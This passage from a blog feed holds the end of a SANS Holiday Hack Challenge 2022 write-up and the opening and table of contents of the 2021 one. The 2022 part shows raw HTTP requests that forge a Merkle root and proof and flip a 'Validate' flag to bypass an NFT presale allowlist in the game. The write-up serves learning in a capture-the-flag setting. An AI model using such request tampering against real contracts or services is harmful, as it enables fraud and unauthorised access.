&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/cgi-bin/presale&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;boredsporcrowboatsociety.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;411e2170d1ac26e8&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;277&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://boredsporcrowboatsociety.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://boredsporcrowboatsociety.com/presale.html?&amp;amp;challenge=bsrs&amp;amp;username=useless&amp;amp;id=0a6556c7-ff84-410c-b1db-59fb1bec0928&amp;amp;area=level5&amp;amp;location=14,15&amp;amp;tokens=&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WalletID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0x129c7E7e786120E3DCD29D4c2ad0d0001616fad2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Root&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0x5fb0f1ec0a42dc34152e3937c295c5e2ad1e105ce5bef576a33d47c3bbe3f42e&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Proof&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Validate&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;true&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Session&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0a6556c7-ff84-410c-b1db-59fb1bec0928&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.23.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Tue, 20 Dec 2022 15:29:41 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Response&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;You&amp;#39;re on the list and good to go! Now... BUY A SPORC!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Nice! The contract believes we're on the list. Now we can buy a Sporc NFT
by sending 100 KC to the SBRS creators' wallet:&lt;/p&gt;
&lt;img alt="The KCTM interface. There are three fields. The first one is filled with the wallet address of BSRS. The second one is the amount of the transaction, 100 KC. The third one is my censored private key. The interface then reads &amp;quot;You have successfully approved the transaction!&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2022/bsrs_nft_approved_transaction.png" /&gt;
&lt;p&gt;Now that we sent 100 KC, let's get our BSRS NFT using the previous form:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/cgi-bin/presale&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;boredsporcrowboatsociety.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;411e2170d1ac26e8&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;278&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://boredsporcrowboatsociety.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://boredsporcrowboatsociety.com/presale.html?&amp;amp;challenge=bsrs&amp;amp;username=useless&amp;amp;id=0a6556c7-ff84-410c-b1db-59fb1bec0928&amp;amp;area=level5&amp;amp;location=14,15&amp;amp;tokens=&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WalletID&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0x129c7E7e786120E3DCD29D4c2ad0d0001616fad2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Root&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0x5fb0f1ec0a42dc34152e3937c295c5e2ad1e105ce5bef576a33d47c3bbe3f42e&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Proof&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Validate&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;false&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Session&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0a6556c7-ff84-410c-b1db-59fb1bec0928&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.23.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Tue, 20 Dec 2022 15:34:11 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;Response&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Success! You are now the proud owner of BSRS Token #000272. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS272, or check it out in the gallery!&amp;lt;br&amp;gt;Transaction: 0xe1351d421455dd4ebb5712194c8f14e0b2c6e1680f2b7f770eb553393d202c89, Block: 76995&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Remember: Just like we planned, tell everyone you know to &amp;lt;u&amp;gt;&amp;lt;em&amp;gt;BUY A BoredSporc&amp;lt;/em&amp;gt;&amp;lt;/u&amp;gt;.&amp;lt;br&amp;gt;When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;The market will tank, but we&amp;#39;ll all be rich!!!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray, I now have the BSRS NFT #272. Here's how it looks like:&lt;/p&gt;
&lt;img alt="My BSRS NFT. It's a Sporc's head with an eyepatch, a blue eye, pink glossy lipstick, and protruding bottom teeth." class="align-center" src="/images/sans-christmas-challenge-2022/BSRS272.png" /&gt;
&lt;p&gt;It's... yeah. Anyway, NFTs and cryptocoins are scams, the only thing we are
interested in is finding our rings.&lt;/p&gt;
&lt;p&gt;And here it is, our fifth and final ring, the Burning Ring of Fire:&lt;/p&gt;
&lt;img alt="The Tolkien Ring. It's a simple golden ring, like the one from Lord of the Rings, etched with red flames." class="align-center" src="/images/sans-christmas-challenge-2022/brof.png" /&gt;
&lt;img alt="Wombley Cube, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/wombleycube.png" /&gt;
&lt;p&gt;&lt;em&gt;Wombley Cube says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You've done your duty, agent.&lt;/p&gt;
&lt;p&gt;Excellent work, especially on Mission #2! I'll log this entry back at STINC
HQ.&lt;/p&gt;
&lt;p&gt;Keep doing work like this, and you'll be sitting on the STINC throne,
leading the agency someday.&lt;/p&gt;
&lt;p&gt;Nobody will know of the job you did here today, but the STINC thanks you.&lt;/p&gt;
&lt;p&gt;I'm just being dramatic, &lt;strong&gt;everyone's&lt;/strong&gt; gonna know how awesome you are!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We can see Grinchum, but he looks... conflicted:&lt;/p&gt;
&lt;img alt="Grinchum as we've first met him" class="align-center" src="/images/sans-christmas-challenge-2022/smeagol.png" /&gt;
&lt;p&gt;&lt;em&gt;Grinchum says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;😠 &lt;em&gt;We wants them... we needs them... Must.. have.. the Preciouses.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;They stole them from us, sneaky little humanses.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;🙂 &lt;em&gt;No, not the humanses, they're my friends.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😏 &lt;em&gt;You don't have any friends. NOBODY likes YOU. You're a liar, and a thief, and a.... grriiiiiiinch.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😢 &lt;em&gt;Go away... we don't need you anymore. The humanses protect us now.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😠 &lt;em&gt;Go away? I protected us. The preciouses are safe because of ME!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;🙂 &lt;em&gt;Leave now, and never.. come back.&lt;/em&gt; 😃 &lt;em&gt;Leave now, and never.. come back!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😁 &lt;em&gt;LEAVE NOW, AND NEVER.. COME BACK!😬&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Friendly human, please go to jolly human's castle! Go on, we will meet you there!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id32"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;With the five golden rings safely recovered, we can finally enter Santa's
castle:&lt;/p&gt;
&lt;img alt="Santa Claus in his usual attire." class="align-center" src="/images/sans-christmas-challenge-2022/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Congratulations! You have foiled Grinchum's foul plan and recovered the
Golden Rings!&lt;/p&gt;
&lt;p&gt;And by the magic of the rings, Grinchum has been restored back to his true,
merry self: Smilegol!&lt;/p&gt;
&lt;p&gt;You see, all Flobbits are drawn to the Rings, but somehow, Smilegol was
able to snatch them from my castle.&lt;/p&gt;
&lt;p&gt;To anyone but me, their allure becomes irresistable the more Rings someone
possesses.&lt;/p&gt;
&lt;p&gt;That allure eventually tarnishes the holder's Holiday Spirit, which is
about giving, not possesing.&lt;/p&gt;
&lt;p&gt;That's exactly what happened to Smilegol; that selfishness morphed him into
Grinchum.&lt;/p&gt;
&lt;p&gt;But thanks to you, Grinchum is no more, and the holiday season is saved!&lt;/p&gt;
&lt;p&gt;Ho ho ho, happy holidays!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Next to Santa, we can see our new Flobbit friend, Smilegol:&lt;/p&gt;
&lt;img alt="Smilegol is a Flobbit wearing a white shirt, a yellow vest, a green coat, and black trousers. He has hari bare feet and dark hair. He is smiling and looks at peace." class="align-center" src="/images/sans-christmas-challenge-2022/smilegol.png" /&gt;
&lt;p&gt;&lt;em&gt;Smilegol says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I must give you my most thankful of thanks, and most sorry of sorries.&lt;/p&gt;
&lt;p&gt;I'm not sure what happened, but I just couldn't resist the Rings' call.&lt;/p&gt;
&lt;p&gt;But once you returned the Rings to Santa, I was no longer so spellbound.&lt;/p&gt;
&lt;p&gt;I could think clearly again, so I shouted off that awful persona.&lt;/p&gt;
&lt;p&gt;And that grouchy Grinchum was gone for good. Now, I can be me again, just
in time for gift giving.&lt;/p&gt;
&lt;p&gt;This is a lesson I won't soon forget, and I certainly won't forget you.&lt;/p&gt;
&lt;p&gt;I wish you smooth sailing on wherever your next voyage takes you!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Oh dear Flobbits, I don't know half of as well as I should like, and I like
less than half of you half as well as you deserve.&lt;/p&gt;
&lt;p&gt;Once again, thanks to the SANS team for this amazing Christmas Challenge!
Exploiting the CI/CD vulnerability is a great exercise for real world
engagement.&lt;/p&gt;
&lt;p&gt;See you next year!&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2021</title><link href="https://allyourbase.utouch.fr/posts/2022/01/04/sans-christmas-challenge-2021/" rel="alternate"></link><published>2022-01-04T00:00:00+01:00</published><updated>2022-01-04T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2022-01-04:/posts/2022/01/04/sans-christmas-challenge-2021/</id><summary type="html">&lt;img alt="The SANS 2021 Christmas Challenge. In the middle, a wooden pannel with a yellow ribbon. The pannel reads &amp;quot;Now Open&amp;quot;. On each side of the pannel, Santa Claus in his usual attire, and Jack Frost, wearing a red suit with white stripes, green shoes and a green shirt. He has pointy ears and blue spiky hair. His arms are crossed and he's smirking like a jerk. We also see four calling birds. One is playing poker, one is blowing in a bird call, one is wearing a tie and is on their phone, and the last one is just shouting." class="align-center" src="/images/sans-christmas-challenge-2021/sans_christmas_challenge_2021_logo.png" /&gt;
&lt;p&gt;Jingle shell, jingle shell, jingle shell rock&lt;/p&gt;
&lt;p&gt;Jingle shells swing and jingle shells ring&lt;/p&gt;
&lt;p&gt;Pwnin' and poppin' up boxes is fun&lt;/p&gt;
&lt;p&gt;Now the jingle hop has begun&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2021/"&gt;2021 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id3"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-1-kringlecon-orientation" id="id4"&gt;Objective 1: KringleCon Orientation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-2" id="id5"&gt;Objective 2:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#piney-sappington-s-cranberry-pi-challenge" id="id6"&gt;Piney Sappington's Cranberry Pi …&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</summary><content type="html">&lt;img alt="The SANS 2021 Christmas Challenge. In the middle, a wooden pannel with a yellow ribbon. The pannel reads &amp;quot;Now Open&amp;quot;. On each side of the pannel, Santa Claus in his usual attire, and Jack Frost, wearing a red suit with white stripes, green shoes and a green shirt. He has pointy ears and blue spiky hair. His arms are crossed and he's smirking like a jerk. We also see four calling birds. One is playing poker, one is blowing in a bird call, one is wearing a tie and is on their phone, and the last one is just shouting." class="align-center" src="/images/sans-christmas-challenge-2021/sans_christmas_challenge_2021_logo.png" /&gt;
&lt;p&gt;Jingle shell, jingle shell, jingle shell rock&lt;/p&gt;
&lt;p&gt;Jingle shells swing and jingle shells ring&lt;/p&gt;
&lt;p&gt;Pwnin' and poppin' up boxes is fun&lt;/p&gt;
&lt;p&gt;Now the jingle hop has begun&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2021/"&gt;2021 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id3"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-1-kringlecon-orientation" id="id4"&gt;Objective 1: KringleCon Orientation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-2" id="id5"&gt;Objective 2:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#piney-sappington-s-cranberry-pi-challenge" id="id6"&gt;Piney Sappington's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bonus-log4jack" id="id7"&gt;Bonus! Log4Jack&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bow-ninecandle-s-blue-team-cranberry-pi-challenge" id="id8"&gt;Bow Ninecandle's blue team Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#icky-mcgoop-s-red-team-cranberry-pi-challenge" id="id9"&gt;Icky McGoop's red team Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#where-in-the-world-is-caramel-santiago" id="id10"&gt;Where in the World is Caramel Santiago?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-3" id="id11"&gt;Objective 3:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#greasy-gopherguts-s-cranberry-pi-challenge" id="id12"&gt;Greasy Gopherguts's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#thaw-frost-tower-s-entrance" id="id13"&gt;Thaw Frost Tower's Entrance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-4" id="id14"&gt;Objective 4:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#noel-boetie-s-cranberry-pi-challenge" id="id15"&gt;Noel Boetie's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#slot-machine-investigation" id="id16"&gt;Slot Machine Investigation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-5" id="id17"&gt;Objective 5:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#jewel-loggins-s-cranberry-pi-challenge" id="id18"&gt;Jewel Loggins's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#strange-usb-device" id="id19"&gt;Strange USB Device&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-6" id="id20"&gt;Objective 6:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#chimney-scissorsticks-s-cranberry-pi-challenge" id="id21"&gt;Chimney Scissorsticks's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#shellcode-primer" id="id22"&gt;Shellcode Primer&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id1" id="id23"&gt;1. Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#loops" id="id24"&gt;2. Loops&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#getting-started" id="id25"&gt;3. Getting started&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#returning-a-value" id="id26"&gt;4. Returning a Value&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#system-calls" id="id27"&gt;5. System Calls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#calling-into-the-void" id="id28"&gt;6. Calling Into the Void&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#getting-rip" id="id29"&gt;7. Getting RIP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#hello-world" id="id30"&gt;8. Hello, World!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id2" id="id31"&gt;9. Hello, World!!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#opening-a-file" id="id32"&gt;10. Opening a File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#reading-a-file" id="id33"&gt;11. Reading a File&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-7-printer-exploitation" id="id34"&gt;Objective 7: Printer Exploitation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-8" id="id35"&gt;Objective 8:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#eve-snowshoes-s-cranberry-pi-challenge" id="id36"&gt;Eve Snowshoes's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#kerberoasting-on-an-open-fire" id="id37"&gt;Kerberoasting on an Open Fire&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-9" id="id38"&gt;Objective 9:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fitzy-shortstack-s-cranberry-pi-challenge" id="id39"&gt;Fitzy Shortstack's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#splunk" id="id40"&gt;Splunk!&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-1" id="id41"&gt;Task 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-2" id="id42"&gt;Task 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-3" id="id43"&gt;Task 3&lt;/a&gt;&lt;/li&gt;
